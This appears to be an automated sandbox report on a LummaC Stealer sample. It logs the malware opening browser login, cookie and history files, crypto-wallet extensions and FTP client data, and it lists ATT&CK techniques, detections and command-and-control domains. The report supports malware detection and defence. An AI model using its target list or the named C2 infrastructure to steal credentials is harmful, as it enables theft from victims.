Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\DUKNXICOZT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\DUKNXICOZT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\ERWQDBYZVW	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\ERWQDBYZVW	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\VWDFPKGDUF	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\VWDFPKGDUF	Jump to behavior

Source: Yara match

File source: Process Memory Space: RegAsm.exe PID: 1412, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.1276608961.0000000003F75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1412, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	411 Process Injection	1 Masquerading	2 OS Credential Dumping	131 Security Software Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	141 Virtualization/Sandbox Evasion	Security Account Manager	141 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	41 Data from Local System	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	411 Process Injection	NTDS	1 File and Directory Discovery	Distributed Component Object Model	2 Clipboard Data	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	22 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
5_6253708004881862888.exe	79%	Virustotal		Browse
5_6253708004881862888.exe	76%	ReversingLabs	ByteCode-MSIL.Trojan.LummaStealer
5_6253708004881862888.exe	100%	Avira	TR/AD.Nekark.fqicu

Source	Detection	Scanner	Label
millyscroqwp.shop	100%	Avira URL Cloud	malware
stamppreewntnq.shop	0%	Avira URL Cloud	safe
https://muggudrowiwm.shop/api	100%	Avira URL Cloud	malware
locatedblsoqp.shop	100%	Avira URL Cloud	malware
https://lev-tolstoi.com/api	0%	Avira URL Cloud	safe
https://lev-tolstoi.com/	0%	Avira URL Cloud	safe
evoliutwoqm.shop	100%	Avira URL Cloud	malware
caffegclasiqwp.shop	100%	Avira URL Cloud	malware
muggudrowiwm.shop	100%	Avira URL Cloud	malware
condedqpwqm.shop	0%	Avira URL Cloud	safe
https://lev-tolstoi.com/apiX	0%	Avira URL Cloud	safe
stagedchheiqwo.shop	0%	Avira URL Cloud	safe
https://lev-tolstoi.com/pi	0%	Avira URL Cloud	safe
traineiwnqo.shop	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
steamcommunity.com	23.55.153.106	true	false	high
lev-tolstoi.com	104.21.66.86	true	false	high
muggudrowiwm.shop	104.131.68.180	true	true	unknown
locatedblsoqp.shop	unknown	unknown	true	unknown
caffegclasiqwp.shop	unknown	unknown	true	unknown
condedqpwqm.shop	unknown	unknown	true	unknown
millyscroqwp.shop	unknown	unknown	true	unknown
stamppreewntnq.shop	unknown	unknown	true	unknown
evoliutwoqm.shop	unknown	unknown	true	unknown
stagedchheiqwo.shop	unknown	unknown	true	unknown
traineiwnqo.shop	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://muggudrowiwm.shop/api	true	Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199724331900	false		high
https://lev-tolstoi.com/api	true	Avira URL Cloud: safe	unknown
stamppreewntnq.shop	true	Avira URL Cloud: safe	unknown
condedqpwqm.shop	true	Avira URL Cloud: safe	unknown
evoliutwoqm.shop	true	Avira URL Cloud: malware	unknown
muggudrowiwm.shop	true	Avira URL Cloud: malware	unknown
locatedblsoqp.shop	true	Avira URL Cloud: malware	unknown
caffegclasiqwp.shop	true	Avira URL Cloud: malware	unknown
millyscroqwp.shop	true	Avira URL Cloud: malware	unknown
stagedchheiqwo.shop	true	Avira URL Cloud: safe	unknown
traineiwnqo.shop	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://lev-tolstoi.com/	RegAsm.exe, 00000008.00000002.1904233183.000000000108E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.1904883004.0000000003460000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.14.dr	false		high
https://lev-tolstoi.com/apiX	RegAsm.exe, 00000008.00000002.1903985717.0000000001006000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lev-tolstoi.com/pi	RegAsm.exe, 00000008.00000002.1904233183.000000000108E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.66.86	lev-tolstoi.com	United States	13335	CLOUDFLARENETUS	false
23.55.153.106	steamcommunity.com	United States	20940	AKAMAI-ASN1EU	false
104.131.68.180	muggudrowiwm.shop	United States	14061	DIGITALOCEAN-ASNUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1577316
Start date and time:	2024-12-18 11:39:14 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
